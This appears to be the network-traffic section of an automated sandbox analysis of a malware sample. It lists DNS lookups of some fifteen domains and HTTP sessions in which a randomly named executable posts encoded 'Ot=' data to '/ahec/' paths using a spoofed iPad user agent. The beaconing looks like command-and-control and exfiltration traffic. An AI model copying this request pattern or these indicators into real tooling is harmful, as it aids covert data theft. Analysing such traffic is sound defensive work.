                                                                        Dec 2, 2023 18:51:51.892307043 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:51.892316103 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:51.892401934 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:51.892493963 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:51.892513037 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:51.892524958 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:51.892538071 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:51.892549992 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:51.892558098 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:51.892565966 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:51.892582893 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:51.892617941 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.077836037 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.077862024 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.077877045 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.077889919 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.077909946 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.077914000 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.077923059 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.077939034 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.077949047 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.077953100 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.077966928 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.077977896 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.077980042 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.077994108 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.078003883 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.078012943 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.078022957 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.078026056 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.078038931 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.078051090 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.078078985 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.078105927 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.078119040 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.078130960 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.078146935 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.078161001 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.078181028 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.078212976 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.078298092 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.078332901 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.227066040 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.263075113 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263103962 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263119936 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263135910 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263149977 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263164043 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263178110 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263195992 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263210058 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263221979 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263235092 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263247967 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263262987 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.263355970 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263369083 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:51:52.263401031 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.263458014 CET4975380192.168.2.10185.74.252.11
                                                                        Dec 2, 2023 18:51:52.263482094 CET8049753185.74.252.11192.168.2.10
                                                                        Dec 2, 2023 18:52:13.782689095 CET8049760107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:13.782706022 CET8049760107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:13.782763004 CET4976080192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:13.782789946 CET4976080192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:13.783102989 CET4976080192.168.2.10107.178.250.177
                                                                        Dec 2, 2023 18:52:13.882342100 CET8049760107.178.250.177192.168.2.10
                                                                        Dec 2, 2023 18:52:21.146512985 CET4976180192.168.2.1037.97.254.27
                                                                        Dec 2, 2023 18:52:21.326364994 CET804976137.97.254.27192.168.2.10
                                                                        Dec 2, 2023 18:52:21.326494932 CET4976180192.168.2.1037.97.254.27
                                                                        Dec 2, 2023 18:52:21.326864004 CET4976180192.168.2.1037.97.254.27
                                                                        Dec 2, 2023 18:52:21.507111073 CET804976137.97.254.27192.168.2.10
                                                                        Dec 2, 2023 18:52:21.507208109 CET4976180192.168.2.1037.97.254.27
                                                                        Dec 2, 2023 18:52:22.836273909 CET4976180192.168.2.1037.97.254.27
                                                                        Dec 2, 2023 18:52:25.414793968 CET4976280192.168.2.1037.97.254.27
                                                                        Dec 2, 2023 18:52:25.599265099 CET804976237.97.254.27192.168.2.10
                                                                        Dec 2, 2023 18:52:25.599541903 CET4976280192.168.2.1037.97.254.27
                                                                        Dec 2, 2023 18:52:25.600060940 CET4976280192.168.2.1037.97.254.27
                                                                        Dec 2, 2023 18:52:25.784513950 CET804976237.97.254.27192.168.2.10
                                                                        Dec 2, 2023 18:52:25.784713984 CET4976280192.168.2.1037.97.254.27
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 2, 2023 18:48:38.710741043 CET6324853192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:48:39.174546003 CET53632481.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:48:55.384646893 CET5692753192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:48:55.568964958 CET53569271.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:49:08.824537992 CET5641453192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:49:09.036936045 CET53564141.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:49:52.761010885 CET5489653192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:49:53.330910921 CET53548961.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:50:08.197048903 CET5094653192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:50:08.603379011 CET53509461.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:50:21.899817944 CET5353953192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:50:22.193814993 CET53535391.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:50:36.146665096 CET6199253192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:50:36.374924898 CET53619921.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:50:49.932344913 CET5871153192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:50:50.930526972 CET5871153192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:50:51.063075066 CET53587111.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:50:51.063102007 CET53587111.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:51:04.353084087 CET6539053192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:51:04.648135900 CET53653901.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:51:19.649832964 CET6118553192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:51:20.230607986 CET53611851.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:51:34.852973938 CET6033753192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:51:35.114291906 CET53603371.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:51:49.868669987 CET6430053192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:51:50.534679890 CET53643001.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:52:04.555967093 CET6338953192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:52:05.508348942 CET53633891.1.1.1192.168.2.10
                                                                        Dec 2, 2023 18:52:20.754319906 CET5948253192.168.2.101.1.1.1
                                                                        Dec 2, 2023 18:52:21.145227909 CET53594821.1.1.1192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 2, 2023 18:48:38.710741043 CET | 192.168.2.10 | 1.1.1.1 | 0x67d9 | Standard query (0) | www.alldaysslimmingstea.com | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:48:55.384646893 CET | 192.168.2.10 | 1.1.1.1 | 0x4c6f | Standard query (0) | www.jones4deepriver.com | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:49:08.824537992 CET | 192.168.2.10 | 1.1.1.1 | 0xf573 | Standard query (0) | www.poria.link | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:49:52.761010885 CET | 192.168.2.10 | 1.1.1.1 | 0x6590 | Standard query (0) | www.makeinai.online | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:50:08.197048903 CET | 192.168.2.10 | 1.1.1.1 | 0x9a66 | Standard query (0) | www.instantconvey.com | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:50:21.899817944 CET | 192.168.2.10 | 1.1.1.1 | 0x63bd | Standard query (0) | www.domainappraisalbot.com | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:50:36.146665096 CET | 192.168.2.10 | 1.1.1.1 | 0x55d2 | Standard query (0) | www.nesmalt.info | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:50:49.932344913 CET | 192.168.2.10 | 1.1.1.1 | 0xd71a | Standard query (0) | www.611erhm.top | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:50:50.930526972 CET | 192.168.2.10 | 1.1.1.1 | 0xd71a | Standard query (0) | www.611erhm.top | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:51:04.353084087 CET | 192.168.2.10 | 1.1.1.1 | 0x2264 | Standard query (0) | www.fam-scharf.net | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:51:19.649832964 CET | 192.168.2.10 | 1.1.1.1 | 0xf296 | Standard query (0) | www.magmadokum.com | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:51:34.852973938 CET | 192.168.2.10 | 1.1.1.1 | 0x246c | Standard query (0) | www.thecoloringbitch.com | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:51:49.868669987 CET | 192.168.2.10 | 1.1.1.1 | 0x5487 | Standard query (0) | www.altralogos.com | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:52:04.555967093 CET | 192.168.2.10 | 1.1.1.1 | 0x19f3 | Standard query (0) | www.77moea.top | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:52:20.754319906 CET | 192.168.2.10 | 1.1.1.1 | 0xf14b | Standard query (0) | www.wrautomotive.online | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 2, 2023 18:48:39.174546003 CET | 1.1.1.1 | 192.168.2.10 | 0x67d9 | No error (0) | www.alldaysslimmingstea.com | alldaysslimmingstea.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2023 18:48:39.174546003 CET | 1.1.1.1 | 192.168.2.10 | 0x67d9 | No error (0) | alldaysslimmingstea.com | - | 162.222.226.77 | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:48:55.568964958 CET | 1.1.1.1 | 192.168.2.10 | 0x4c6f | No error (0) | www.jones4deepriver.com | - | 74.208.236.181 | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:49:09.036936045 CET | 1.1.1.1 | 192.168.2.10 | 0xf573 | No error (0) | www.poria.link | - | 172.67.184.73 | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:49:09.036936045 CET | 1.1.1.1 | 192.168.2.10 | 0xf573 | No error (0) | www.poria.link | - | 104.21.18.253 | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:49:53.330910921 CET | 1.1.1.1 | 192.168.2.10 | 0x6590 | No error (0) | www.makeinai.online | - | 37.140.192.89 | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:50:08.603379011 CET | 1.1.1.1 | 192.168.2.10 | 0x9a66 | No error (0) | www.instantconvey.com | instantconvey.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2023 18:50:08.603379011 CET | 1.1.1.1 | 192.168.2.10 | 0x9a66 | No error (0) | instantconvey.com | - | 131.153.147.90 | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:50:22.193814993 CET | 1.1.1.1 | 192.168.2.10 | 0x63bd | No error (0) | www.domainappraisalbot.com | - | 94.23.162.163 | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:50:36.374924898 CET | 1.1.1.1 | 192.168.2.10 | 0x55d2 | No error (0) | www.nesmalt.info | - | 66.29.155.54 | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:50:51.063075066 CET | 1.1.1.1 | 192.168.2.10 | 0xd71a | No error (0) | www.611erhm.top | - | 34.149.198.43 | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:50:51.063075066 CET | 1.1.1.1 | 192.168.2.10 | 0xd71a | No error (0) | www.611erhm.top | - | 34.117.26.57 | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:50:51.063102007 CET | 1.1.1.1 | 192.168.2.10 | 0xd71a | No error (0) | www.611erhm.top | - | 34.149.198.43 | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:50:51.063102007 CET | 1.1.1.1 | 192.168.2.10 | 0xd71a | No error (0) | www.611erhm.top | - | 34.117.26.57 | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:51:04.648135900 CET | 1.1.1.1 | 192.168.2.10 | 0x2264 | No error (0) | www.fam-scharf.net | fam-scharf.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2023 18:51:04.648135900 CET | 1.1.1.1 | 192.168.2.10 | 0x2264 | No error (0) | fam-scharf.net | - | 81.169.145.70 | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:51:20.230607986 CET | 1.1.1.1 | 192.168.2.10 | 0xf296 | No error (0) | www.magmadokum.com | redirect.natrocdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2023 18:51:20.230607986 CET | 1.1.1.1 | 192.168.2.10 | 0xf296 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2023 18:51:20.230607986 CET | 1.1.1.1 | 192.168.2.10 | 0xf296 | No error (0) | natroredirect.natrocdn.com | - | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:51:35.114291906 CET | 1.1.1.1 | 192.168.2.10 | 0x246c | No error (0) | www.thecoloringbitch.com | thecoloringbitch.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2023 18:51:35.114291906 CET | 1.1.1.1 | 192.168.2.10 | 0x246c | No error (0) | thecoloringbitch.com | - | 162.241.252.161 | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:51:50.534679890 CET | 1.1.1.1 | 192.168.2.10 | 0x5487 | No error (0) | www.altralogos.com | altralogos.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2023 18:51:50.534679890 CET | 1.1.1.1 | 192.168.2.10 | 0x5487 | No error (0) | altralogos.com | - | 185.74.252.11 | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:52:05.508348942 CET | 1.1.1.1 | 192.168.2.10 | 0x19f3 | No error (0) | www.77moea.top | - | 107.178.250.177 | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:52:05.508348942 CET | 1.1.1.1 | 192.168.2.10 | 0x19f3 | No error (0) | www.77moea.top | - | 34.120.55.112 | A (IP address) | IN (0x0001) | false
Dec 2, 2023 18:52:21.145227909 CET | 1.1.1.1 | 192.168.2.10 | 0xf14b | No error (0) | www.wrautomotive.online | wrautomotive.online | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2023 18:52:21.145227909 CET | 1.1.1.1 | 192.168.2.10 | 0xf14b | No error (0) | wrautomotive.online | - | 37.97.254.27 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49711 | 162.222.226.77 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe

Timestamp | Bytes transferred | Direction | Data
Dec 2, 2023 18:48:39.371944904 CET | 521 | OUT | GET /ahec/?Ot=0lWeLq0ljZnDSWqKPiItN+dDtGaop8tJSpt/SUCn4seLkPj1kpVBncTOO8qbY1skp8kxUg4twvHodh//BlyQvVj0G3LunRoJLQ==&6d=QlZl HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.alldaysslimmingstea.com
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Dec 2, 2023 18:48:39.566896915 CET | 898 | IN | HTTP/1.1 404 Not Found
Date: Sat, 02 Dec 2023 17:48:39 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Tue, 15 Mar 2022 21:16:32 GMT
Accept-Ranges: bytes
Content-Length: 583
Vary: Accept-Encoding
Content-Type: text/html
                                                                        Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49712 | 74.208.236.181 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe

Timestamp | Bytes transferred | Direction | Data
Dec 2, 2023 18:48:55.706455946 CET | 807 | OUT | POST /ahec/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.jones4deepriver.com
Origin: http://www.jones4deepriver.com
Referer: http://www.jones4deepriver.com/ahec/
Cache-Control: no-cache
Content-Length: 183
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=wmeP+ID8aGX5xnV5bDAf7xIzOuEi3vhUDThOds+ECR90iHnMJ7VSaPatqKT4UTn65q/mgqniicx7PsvtDEZeTDQztR5WTmoKamgnRfSzT4dS3w3d9OBgCQ5WkwusQyCt1dpnceRJsU6CnhYxaWD4uEpcro9GdfIyjnvOux4s1H0nHCxDCw==
Dec 2, 2023 18:48:55.845355034 CET | 634 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Sat, 02 Dec 2023 17:48:55 GMT
Server: Apache
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49713 | 74.208.236.181 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe

Timestamp | Bytes transferred | Direction | Data
Dec 2, 2023 18:48:58.360888958 CET | 827 | OUT | POST /ahec/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.jones4deepriver.com
Origin: http://www.jones4deepriver.com
Referer: http://www.jones4deepriver.com/ahec/
Cache-Control: no-cache
Content-Length: 203
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=wmeP+ID8aGX5wHl5Zgof5RIwCOEi9PhQDTtOdtLJCnl0imXMI6VSZPatiqThbznz5qzUgoDiidV7PpDtWlZBSTQ1rR5HXmoKamgnRfXmT4FS3hHd8vBjPw5RjwusHiCp1doyccljsS+CnhIxaDj7hEoZ048actJJtEbjiwUTuRZNCXdQFKTKXeHx68OfHFj+1vYYSbw=
                                                                        Dec 2, 2023 18:48:58.498862028 CET | 634 | IN | HTTP/1.1 404 Not Found
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Date: Sat, 02 Dec 2023 17:48:58 GMT
                                                                        Server: Apache
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        3 | 192.168.2.10 | 49714 | 74.208.236.181 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:49:01.020860910 CET | 1840 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.jones4deepriver.com
                                                                        Origin: http://www.jones4deepriver.com
                                                                        Referer: http://www.jones4deepriver.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:49:01.160701990 CET | 634 | IN | HTTP/1.1 404 Not Found
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Date: Sat, 02 Dec 2023 17:49:01 GMT
                                                                        Server: Apache
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        4 | 192.168.2.10 | 49715 | 74.208.236.181 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:49:03.673619032 CET | 517 | OUT | GET /ahec/?Ot=9k2v98v8fW7x5mtxcj8a5QMRCoEP1Px6NgJCH+u8B3tf6gDcFaFwcfLjsp7tbCeN6M+Gl5HR8oN4IorBb0piTBAHvy1fUTc2Bw==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.jones4deepriver.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:49:03.809576988 CET | 824 | IN | HTTP/1.1 404 Not Found
                                                                        Content-Type: text/html
                                                                        Content-Length: 626
                                                                        Connection: close
                                                                        Date: Sat, 02 Dec 2023 17:49:03 GMT
                                                                        Server: Apache
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        5 | 192.168.2.10 | 49716 | 172.67.184.73 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:49:09.169353008 CET | 780 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.poria.link
                                                                        Origin: http://www.poria.link
                                                                        Referer: http://www.poria.link/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=FXiEFcnYTh5TWB+h9a01KtfYux9CWBqeibTyeLFE+I7ojhbMbrO47DIqdXYvDoS2tzpIFUzcZHgnGW7ds8Fp3VC2JnMccgrv/DguLtY5zbt8hRWNP/6o9GSslkDjZkCrmEbDGbAIWtsMxFJi0a3SYdCIj1BwzkusrRwsKJ4DXhjBiMBPZA==


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        6 | 192.168.2.10 | 49717 | 172.67.184.73 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:49:11.826541901 CET | 800 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.poria.link
                                                                        Origin: http://www.poria.link
                                                                        Referer: http://www.poria.link/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=FXiEFcnYTh5TXhih/5c1LNfXgR9CEBrZicbyeP1U+drogBrMava44DIqT3YqHoShtzU1FVPcZHknGWLdtP9q1FC0c3MeSArv/DguLtMTzbV8hhmNOdCv+GSjsEDjdkCvmEbbGatjWogMxE5i0vbRDtCKsVAZ8Vyinx8qLNcTKG6ujZtce7ZC2XXJINcOsljWAjCYuq8=


